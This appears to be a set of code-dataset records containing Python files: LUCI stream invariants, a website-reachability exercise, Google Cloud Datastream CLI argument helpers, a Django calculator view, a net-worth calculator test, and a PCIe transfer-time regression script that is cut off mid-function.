add_step_text(self, text):\n pass\n\n def add_step_summary_text(self, text):\n pass\n\n def set_summary_markdown(self, text):\n pass\n\n def add_step_link(self, name, url):\n assert isinstance(name, str), 'Link name %s is not a string' % name\n assert isinstance(url, str), 'Link url %s is not a string' % url\n\n def set_step_status(self, status, had_timeout):\n _ = had_timeout\n assert status in StepPresentation.STATUSES, 'Unknown status %r' % status\n if status == 'SUCCESS':\n # A constraint imposed by the annotations implementation\n assert self._status == 'SUCCESS', (\n 'Cannot set successful status after status is %s' % self._status)\n self._status = 
status\n\n def set_build_property(self, key, value):\n pass\n\n def set_step_tag(self, key, value):\n assert isinstance(key, str), 'Step Tag key %s is not a string' % key\n assert isinstance(value, str), 'Step Tag value %s is not a string' % value\n assert key != '', 'Step Tag key %s is empty' % key\n assert value != '', 'Step Tag value %s is empty' % value\n\n class LogStream(StreamEngine.Stream):\n def __init__(self, step_stream, log_name):\n self._step_stream = step_stream\n self._log_name = log_name\n self._open = True\n\n def write_line(self, line):\n assert '\\n' not in line, 'Newline in %r' % (line,)\n assert self._step_stream._open\n assert self._open\n\n def close(self):\n assert self._step_stream._open\n assert self._open\n self._open = False\n\n def new_step_stream(self, name_tokens, allow_subannotations,\n merge_step=False):\n del allow_subannotations, merge_step\n\n if any('|' in token for token in name_tokens):\n raise ValueError(\n 'The pipe (\"|\") character is reserved in step names: %r'\n % (name_tokens,))\n\n name = '|'.join(name_tokens)\n assert name not in self._streams, 'Step %r already exists' % (name,)\n self._streams.add(name)\n return self.StepStream(self, name)\n","repo_name":"luci/recipes-py","sub_path":"recipe_engine/internal/stream/invariants.py","file_name":"invariants.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"38653079829","text":"'''Exercício Python 114: Crie um código em Python que teste se o site pudim está acessível pelo computador usado.'''\n\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nurl = Request('http://pudim.com.br/')\n\ntry:\n response = urlopen(url)\nexcept (HTTPError, URLError):\n print('\\033[0;31mO site não está disponível.\\033[m')\nelse:\n print('\\033[0;31mConsegui acessar o site Pudim com sucesso!\\033[m')","repo_name":"gdagomes/Python","sub_path":"Curso_em_video/Mundo 3 - Estruturas de dados, funções, módulos e tratamento de erros/ex114.py","file_name":"ex114.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27767386949","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope.concepts import concepts\nfrom googlecloudsdk.command_lib.util.concepts import concept_parsers\nfrom googlecloudsdk.command_lib.util.concepts import presentation_specs\n\n_MYSQL_SOURCE_CONFIG_HELP_TEXT_BETA = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for MySQL Source Config.\n\n The JSON file is formatted as follows, with snake_case field naming:\n\n ```\n {\n \"allowlist\": {},\n \"rejectlist\": {\n \"mysql_databases\": [\n {\n \"database_name\":\"sample_database\",\n \"mysql_tables\": [\n {\n \"table_name\": \"sample_table\",\n \"mysql_columns\": [\n {\n \"column_name\": \"sample_column\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_MYSQL_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for MySQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"mysqlDatabases\": [\n {\n \"database\":\"sample_database\",\n \"mysqlTables\": [\n {\n \"table\": \"sample_table\",\n \"mysqlColumns\": [\n {\n 
\"column\": \"sample_column\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_ORACLE_SOURCE_CONFIG_HELP_TEXT_BETA = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Oracle Source Config.\n\n The JSON file is formatted as follows, with snake_case field naming:\n\n ```\n {\n \"allowlist\": {},\n \"rejectlist\": {\n \"oracle_schemas\": [\n {\n \"schema_name\": \"SAMPLE\",\n \"oracle_tables\": [\n {\n \"table_name\": \"SAMPLE_TABLE\",\n \"oracle_columns\": [\n {\n \"column_name\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_ORACLE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Oracle Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"oracleSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"oracleTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"oracleColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_POSTGRESQL_CREATE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for PostgreSQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"postgresqlSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"postgresqlTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"postgresqlColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n },\n \"replicationSlot\": \"SAMPLE_REPLICATION_SLOT\",\n \"publication\": \"SAMPLE_PUBLICATION\"\n }\n ```\n\"\"\"\n\n_POSTGRESQL_UPDATE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for PostgreSQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"postgresqlSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"postgresqlTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"postgresqlColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n },\n \"replicationSlot\": \"SAMPLE_REPLICATION_SLOT\",\n \"publication\": \"SAMPLE_PUBLICATION\"\n }\n ```\n\"\"\"\n\n\ndef ConnectionProfileAttributeConfig(name='connection_profile'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The connection profile of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef PrivateConnectionAttributeConfig(name='private_connection'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The private connection of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef StreamAttributeConfig(name='stream'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The stream of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef RouteAttributeConfig(name='route'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The route of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef LocationAttributeConfig():\n return concepts.ResourceParameterAttributeConfig(\n name='location', help_text='The Cloud location for the {resource}.')\n\n\ndef GetLocationResourceSpec(resource_name='location'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations',\n resource_name=resource_name,\n 
locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetConnectionProfileResourceSpec(resource_name='connection_profile'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.connectionProfiles',\n resource_name=resource_name,\n connectionProfilesId=ConnectionProfileAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetPrivateConnectionResourceSpec(resource_name='private_connection'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.privateConnections',\n resource_name=resource_name,\n privateConnectionsId=PrivateConnectionAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetStreamResourceSpec(resource_name='stream'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.streams',\n resource_name=resource_name,\n streamsId=StreamAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetRouteResourceSpec(resource_name='route'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.privateConnections.routes',\n resource_name=resource_name,\n routesId=RouteAttributeConfig(name=resource_name),\n privateConnectionsId=PrivateConnectionAttributeConfig(\n 'private-connection'),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef AddConnectionProfileResourceArg(parser,\n verb,\n release_track,\n positional=True,\n required=True):\n \"\"\"Add a resource argument for a Datastream connection profile.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: Some arguments are added based on the command release\n track.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n required: bool, if True, means that a flag is required.\n \"\"\"\n if positional:\n name = 'connection_profile'\n else:\n name = '--connection-profile'\n\n connectivity_parser = parser.add_group(mutex=True)\n connectivity_parser.add_argument(\n '--static-ip-connectivity',\n action='store_true',\n help=\"\"\"use static ip connectivity\"\"\")\n\n if release_track == base.ReleaseTrack.BETA:\n connectivity_parser.add_argument(\n '--no-connectivity', action='store_true', help=\"\"\"no connectivity\"\"\")\n\n forward_ssh_parser = connectivity_parser.add_group()\n forward_ssh_parser.add_argument(\n '--forward-ssh-hostname',\n help=\"\"\"Hostname for the SSH tunnel.\"\"\",\n required=required)\n forward_ssh_parser.add_argument(\n '--forward-ssh-username',\n help=\"\"\"Username for the SSH tunnel.\"\"\",\n required=required)\n forward_ssh_parser.add_argument(\n '--forward-ssh-port',\n help=\"\"\"Port for the SSH tunnel, default value is 22.\\\n \"\"\",\n default=22)\n password_group = forward_ssh_parser.add_group(required=required, mutex=True)\n password_group.add_argument(\n '--forward-ssh-password', help=\"\"\"\\\n SSH password.\n \"\"\")\n password_group.add_argument(\n '--forward-ssh-private-key', help='SSH private key..')\n\n # TODO(b/207467120): deprecate BETA client.\n private_connection_flag_name = 'private-connection'\n if release_track == 
base.ReleaseTrack.BETA:\n private_connection_flag_name = 'private-connection-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetConnectionProfileResourceSpec(),\n 'The connection profile {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % private_connection_flag_name,\n GetPrivateConnectionResourceSpec(),\n 'Resource ID of the private connection.',\n flag_name_overrides={'location': ''},\n group=connectivity_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--%s.location' % private_connection_flag_name: ['--location'],\n }).AddToParser(parser)\n\n\ndef AddConnectionProfileDiscoverResourceArg(parser):\n \"\"\"Add a resource argument for a Datastream connection profile discover command.\n\n Args:\n parser: the parser for the command.\n \"\"\"\n connection_profile_parser = parser.add_group(mutex=True, required=True)\n connection_profile_parser.add_argument(\n '--connection-profile-object-file',\n help=\"\"\"Path to a YAML (or JSON) file containing the configuration\n for a connection profile object. If you pass - as the value of the\n flag the file content will be read from stdin.\"\"\"\n )\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n '--connection-profile-name',\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the connection profile.',\n flag_name_overrides={'location': ''},\n group=connection_profile_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--connection-profile-name.location': ['--location'],\n }).AddToParser(parser)\n\n\ndef GetVpcResourceSpec():\n \"\"\"Constructs and returns the Resource specification for VPC.\"\"\"\n\n def VpcAttributeConfig():\n return concepts.ResourceParameterAttributeConfig(\n name='vpc',\n help_text=\"\"\"fully qualified name of the VPC Datastream will peer to.\"\"\"\n )\n\n return concepts.ResourceSpec(\n 'compute.networks',\n resource_name='vpc',\n network=VpcAttributeConfig(),\n project=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG)\n\n\ndef AddPrivateConnectionResourceArg(parser,\n verb,\n release_track,\n positional=True):\n \"\"\"Add a resource argument for a Datastream private connection.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: Some arguments are added based on the command release\n track.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n \"\"\"\n if positional:\n name = 'private_connection'\n else:\n name = '--private-connection'\n\n vpc_peering_config_parser = parser.add_group(required=True)\n\n vpc_peering_config_parser.add_argument(\n '--subnet',\n help=\"\"\"A free subnet for peering. 
(CIDR of /29).\"\"\",\n required=True)\n\n # TODO(b/207467120): use only vpc flag.\n vpc_field_name = 'vpc'\n if release_track == base.ReleaseTrack.BETA:\n vpc_field_name = 'vpc-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetPrivateConnectionResourceSpec(),\n 'The private connection {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % vpc_field_name,\n GetVpcResourceSpec(),\n 'Resource ID of the private connection.',\n group=vpc_peering_config_parser,\n required=True)\n ]\n concept_parsers.ConceptParser(\n resource_specs).AddToParser(parser)\n\n\ndef AddStreamResourceArg(parser, verb, release_track, required=True):\n \"\"\"Add resource arguments for creating/updating a stream.\n\n Args:\n parser: argparse.ArgumentParser, the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: base.ReleaseTrack, some arguments are added based on the\n command release track.\n required: bool, if True, means that a flag is required.\n \"\"\"\n source_parser = parser.add_group(required=required)\n source_config_parser_group = source_parser.add_group(\n required=required, mutex=True)\n source_config_parser_group.add_argument(\n '--oracle-source-config',\n help=_ORACLE_SOURCE_CONFIG_HELP_TEXT_BETA if release_track\n == base.ReleaseTrack.BETA else _ORACLE_SOURCE_CONFIG_HELP_TEXT)\n source_config_parser_group.add_argument(\n '--mysql-source-config',\n help=_MYSQL_SOURCE_CONFIG_HELP_TEXT_BETA if release_track\n == base.ReleaseTrack.BETA else _MYSQL_SOURCE_CONFIG_HELP_TEXT)\n source_config_parser_group.add_argument(\n '--postgresql-source-config',\n help=_POSTGRESQL_UPDATE_SOURCE_CONFIG_HELP_TEXT if verb == 'update'\n else _POSTGRESQL_CREATE_SOURCE_CONFIG_HELP_TEXT\n )\n\n destination_parser = parser.add_group(required=required)\n destination_config_parser_group = destination_parser.add_group(\n required=required, mutex=True)\n destination_config_parser_group.add_argument(\n '--gcs-destination-config',\n help=\"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Google Cloud Storage Destination Config.\n\n The JSON file is formatted as follows:\n\n ```\n {\n \"path\": \"some/path\",\n \"fileRotationMb\":5,\n \"fileRotationInterval\":\"15s\",\n \"avroFileFormat\": {}\n }\n ```\n \"\"\",\n )\n destination_config_parser_group.add_argument(\n '--bigquery-destination-config',\n help=\"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Google BigQuery Destination Config.\n\n The JSON file is formatted as follows:\n\n ```\n {\n \"sourceHierarchyDatasets\": {\n \"datasetTemplate\": {\n \"location\": \"us-central1\",\n \"datasetIdPrefix\": \"my_prefix\",\n \"kmsKeyName\": \"projects/{project}/locations/{location}/keyRings/{key_ring}/cryptoKeys/{cryptoKey}\"\n }\n },\n \"dataFreshness\": \"3600s\"\n }\n ```\n \"\"\",\n )\n\n source_field = 'source'\n destination_field = 'destination'\n if release_track == base.ReleaseTrack.BETA:\n source_field = 'source-name'\n destination_field = 'destination-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n 'stream',\n GetStreamResourceSpec(),\n 'The stream to {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % source_field,\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the source connection profile.',\n required=required,\n flag_name_overrides={'location': ''},\n group=source_parser),\n 
presentation_specs.ResourcePresentationSpec(\n '--%s' % destination_field,\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the destination connection profile.',\n required=required,\n flag_name_overrides={'location': ''},\n group=destination_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--%s.location' % source_field: ['--location'],\n '--%s.location' % destination_field: ['--location']\n }).AddToParser(parser)\n\n\ndef AddStreamObjectResourceArg(parser):\n \"\"\"Add a resource argument for a Datastream stream object.\n\n Args:\n parser: the parser for the command.\n \"\"\"\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n '--stream',\n GetStreamResourceSpec(),\n 'The stream to list objects for.',\n required=True),\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--stream.location': ['--location'],\n }).AddToParser(parser)\n\n\ndef AddRouteResourceArg(parser, verb, positional=True):\n \"\"\"Add a resource argument for a Datastream route.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to create'.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n \"\"\"\n if positional:\n name = 'route'\n else:\n name = '--route'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetRouteResourceSpec(),\n 'The route {}.'.format(verb),\n required=True)\n ]\n concept_parsers.ConceptParser(\n resource_specs).AddToParser(parser)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/datastream/resource_args.py","file_name":"resource_args.py","file_ext":"py","file_size_in_byte":18432,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"29539219952","text":"from django.views.generic import TemplateView\nfrom django.shortcuts import render\nimport math\n# views for the home and calculate pages\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n\nclass CalcPageView(TemplateView):\n template_name = \"calculate.html\"\n# This function is called before getting the answer page\ndef answer(request):\n num1 = int(request.POST[\"num1\"])\n num2 = int(request.POST[\"num2\"])\n ans = 0\n# If statement to find what math operator to use\n if (request.POST[\"operation\"] == \"+\"):\n print(\"found +\")\n ans = num1 + num2\n elif (request.POST[\"operation\"] == \"-\"):\n print(\"found -\")\n ans = num1 - num2\n elif (request.POST[\"operation\"] == \"x\"):\n print(\"found x\")\n ans = num1 * num2\n elif (request.POST[\"operation\"] == \"/\"):\n print(\"found /\")\n ans = num1 / num2\n elif (request.POST[\"operation\"] == \"^\"):\n print(\"found ^\")\n ans = num1 ** num2\n else:\n print(\"found √\")\n ans = math.sqrt(num2)\n# sending in the data through the django template. The data has to go as a dictionary\n return render(request, \"answer.html\", {\"answer\": ans})\n\ndef extra(request):\n num1 = int(request.POST[\"num1\"])\n ans = 0\n# If statement to find what math operator to use\n if (request.POST[\"operation\"] == \"√\"):\n print(\"found √\")\n ans = math.sqrt(num1)\n elif(request.POST[\"operation\"] == \"cos\"):\n print(\"found cos\")\n ans = math.cos(num1)\n elif(request.POST[\"operation\"] == \"tan\"):\n print(\"found tan\")\n ans = math.tan(num1)\n else:\n print(\"found sin\")\n ans = math.sin(num1)\n# sending in the data through the django template. 
The data has to go as a dictionary\n return render(request, \"extra.html\", {\"answer\": ans})\n\n\n\n# python manage.py runserver\n\n# source .venv/bin/activate","repo_name":"BrighamV/web_App","sub_path":"django_project/calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73572803422","text":"from src.NetWorthCalculator import NetWorthCalculator\n\n\ndef test_net_worth_calculator() -> None:\n calculator = NetWorthCalculator(\n initial_investments=237000.0,\n initial_savings=20000.0,\n initial_income=314000.0,\n yearly_costs=53000.0,\n rate_of_return=0.07,\n rate_of_comp_growth=0.05,\n initial_age=25,\n )\n age, net_worth = calculator.calculate_net_worth()\n assert len(age) == len(net_worth)\n assert net_worth[0] == 257000.0\n assert net_worth[1] == 550290.0\n assert net_worth[2] == 880595.3\n\n","repo_name":"sethsaperstein/financialprojection","sub_path":"test/test_net_worth_calculator.py","file_name":"test_net_worth_calculator.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2912419101","text":"import subprocess\nimport sys\nimport numpy as np\nimport scipy.optimize as scipop\nimport scipy as sc\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom scipy.interpolate import interp1d\n\nmachine = 'dungani'\nresDir = 'Results_' + machine + '/'\n\nwith open(resDir + 'bandwidth_log_' + machine + '.md_sorted', \"r\") as file0:\n bw_db = file0.readlines()\n\n# For now use artificial bound to check\nbounds = [1e5,1e6,8e9]\n\ndef predict_error(X,Y):\n answer = []\n for val,prediction in zip(X,Y):\n if val == 0 and prediction ==0:\n answer.append(0)\n elif val == 0:\n answer.append(abs(val-prediction)/prediction)\n else:\n answer.append(abs(val-prediction)/val)\n return answer\n\ndef Bound_LinearRegression_1d(X_list,Y_list,lower_bound, upper_bound):\n bounded_Y = []\n bounded_X = []\n for qX, qY in zip(X_list, Y_list):\n if (qX < upper_bound and qX >= lower_bound):\n bounded_X.append(qX)\n bounded_Y.append(qY)\n x = np.array(bounded_X).reshape(-1, 1)\n y = np.array(bounded_Y)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n if model.intercept_ < 0:\n print('Negative intercept...ignoring:', model.intercept_)\n #model.intercept_ = 0\n if model.coef_ < 0:\n print('Negative coef...danger:', model.coef_)\n error = sum(predict_error(bounded_Y, model.predict(x)))/len(bounded_Y)\n print (error)\n return (model, error)\n\ndef LinearRegression_1d(X_list,Y_list):\n linear_subparts = []\n prev_bound = 0\n err = 0\n for upper_bound in bounds:\n pred,pred_err = Bound_LinearRegression_1d(X_list,Y_list,prev_bound, upper_bound)\n linear_subparts.append(pred) #.intercept_, model.coef_, lesser_bound, upper_bound)\n prev_bound = upper_bound\n err += pred_err\n err = err / len(bounds)\n print(err)\n return linear_subparts\n\ndef GigaVal_per_s(val, time):\n return val * 1e-9 / time\n\ndef GigaVal_per_s_l(l_val, l_time): \n answer = []\n for val, time in zip(l_val, l_time):\n if time!= 0:\n answer.append(val * 1e-9 / time)\n elif val!=0:\n sys.exit('Error: GigaVal_per_s_l called with elem val=%d time=%d' % (val,time))\n else:\n answer.append(0) \n return answer\n\ndef linearize_cpu_to_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not 
found')\n time = []\n bytes = []\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0:\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n return LinearRegression_1d(bytes,time)\n\ndef linearize_gpu_to_cpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = []\n bytes = []\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == 0 and int(temp[2]) == -1:\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n return LinearRegression_1d(bytes,time)\n\ndef t_transfer_to_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = [0]\n bytes = [0]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0 and True: #temp[-1] != 'synth\\n':\n if bytes[-1] != int(temp[0]):\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n else:\n print('Duplicate entry found for %d bytes' % bytes[-1])\n x = np.array(bytes).reshape(-1, 1)\n y = np.array(time)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n\n f = interp1d(bytes, time, kind='linear')\n f1 = interp1d(bytes, time, kind='zero')\n f2 = interp1d(bytes, time, kind='slinear')\n f3 = interp1d(bytes, time, kind='quadratic')\n f4 = interp1d(bytes, time, kind='cubic')\n return model.predict, f, f1, f2, f3, f4\n\ndef t_transfer_from_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = [0]\n bytes = [0]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == 0 and int(temp[2]) == -1 and True: #temp[-1] != 'synth\\n':\n if bytes[-1] != int(temp[0]):\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n else:\n print('Duplicate entry found for %d bytes' % bytes[-1])\n x = np.array(bytes).reshape(-1, 1)\n y = np.array(time)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n from scipy.interpolate import interp1d\n f = interp1d(bytes, time, kind='linear')\n f1 = interp1d(bytes, time, kind='zero')\n f2 = interp1d(bytes, time, kind='slinear')\n f3 = interp1d(bytes, time, kind='quadratic')\n f4 = interp1d(bytes, time, kind='cubic')\n return model.predict, f, f1, f2, f3, f4\n\nf_send_bound_regresion = linearize_cpu_to_gpu()\nf_send_reg, f_send_inter_linear, f_send_inter_zero, f_send_inter_slinear, f_send_inter_quadratic, f_send_inter_cubic = t_transfer_to_gpu()\nf_recv_bound_regresion = linearize_gpu_to_cpu()\nf_recv_reg, f_recv_inter_linear, f_recv_inter_zero, f_recv_inter_slinear, f_recv_inter_quadratic, f_recv_inter_cubic = t_transfer_from_gpu()\ndef t_memcpy(bytes, src, dest):\n if(bytes < 0):\n return 0 #float(\"inf\")\n elif (bytes < 1):\n return 0\n # For now only for dev0 <-> host\n elif (src == -1 and dest == 0):\n ctr = 0\n for bound in bounds:\n if bytes < bound:\n return f_send_bound_regresion[ctr](np.array(bytes).reshape(-1, 1))\n ctr +=1\n return f_send_bound_regresion[-1](np.array(bytes).reshape(-1, 1))\n elif (src == 0 and dest == -1):\n ctr = 0\n for bound in bounds:\n if bytes < bound:\n return f_recv_bound_regresion[ctr](np.array(bytes).reshape(-1, 1))\n ctr +=1\n return f_recv_bound_regresion[-1](np.array(bytes).reshape(-1, 1))\n\ndef plot_transfers(plot_up_bound):\n plot_down_bound = 0\n xnew = np.linspace(plot_down_bound, plot_up_bound, 
num=200, endpoint=True)\n time = [[0],[0]]\n bytes = [[0],[0]]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0 and int(temp[0])<=plot_up_bound: #temp[-1] != 'synth\\n':\n if bytes[0][-1] != int(temp[0]):\n time[0].append(float(temp[3]))\n bytes[0].append(int(temp[0]))\n elif int(temp[1]) == 0 and int(temp[2]) == -1 and int(temp[0])<=plot_up_bound:\n if bytes[1][-1] != int(temp[0]):\n time[1].append(float(temp[3]))\n bytes[1].append(int(temp[0]))\n import matplotlib.pyplot as plt\n plt.plot(bytes[0], time[0], 'o', bytes[0],f_send_reg(np.array(bytes[0]).reshape(-1, 1)), '-', bytes[0], f_send_inter_linear(bytes[0]), '-', bytes[0], list(map(lambda x: t_memcpy(x,-1,0), bytes[0])), '-')\n # plt.xscale('log')\n plt.legend(['Host->Device(Samples)', 'Host->Device(Single Linear regression)', 'Host->Device(interpolate linear)', 'Host->Device(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Time(s)')\n plt.xlabel('Bytes')\n plt.title('PCI-e Time (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Time_'+ machine + '_' + str(plot_up_bound) + '_bytes_host_to_device.eps', format='eps')\n plt.close()\n plt.plot(bytes[1], time[1], 'o', bytes[1],f_recv_reg(np.array(bytes[1]).reshape(-1, 1)), '-', bytes[1], f_recv_inter_linear(bytes[1]), '-', bytes[1], list(map(lambda x: t_memcpy(x,0,-1), bytes[1])), '-')\n # plt.xscale('log')\n plt.legend(['Device->Host(Samples)', 'Device->Host(Single Linear regression)', 'Device->Host(interpolate linear)', 'Device->Host(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Time(s)')\n plt.xlabel('Bytes')\n plt.title('PCI-e Time (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Time_'+ machine + '_' + str(plot_up_bound) + '_bytes_device_to_host.eps', format='eps')\n plt.close()\n\n plt.plot( bytes[0],predict_error(time[0], f_send_reg(np.array(bytes[0]).reshape(-1, 1))), '-', bytes[0], predict_error(time[0], f_send_inter_linear(np.array(bytes[0]).reshape(-1, 1))), '-', bytes[0], predict_error(time[0], list(map(lambda x: t_memcpy(x,-1,0), bytes[0]))) , '-')\n # plt.xscale('log')\n plt.legend([ 'Host->Device(Single Linear regression)', 'Host->Device(interpolate linear)', 'Host->Device(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Error(0-1)')\n plt.xlabel('Bytes')\n plt.title('Prediction Error (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Error_'+ machine + '_' + str(plot_up_bound) + '_bytes_host_to_device.eps', format='eps')\n plt.close()\n plt.plot( bytes[1],predict_error(time[1], f_recv_reg(np.array(bytes[1]).reshape(-1, 1))), '-', bytes[1], predict_error(time[1], f_recv_inter_linear(np.array(bytes[1]).reshape(-1, 1))), '-', bytes[1], predict_error(time[1], list(map(lambda x: t_memcpy(x,0,-1), bytes[1]))) , '-')\n # plt.xscale('log')\n 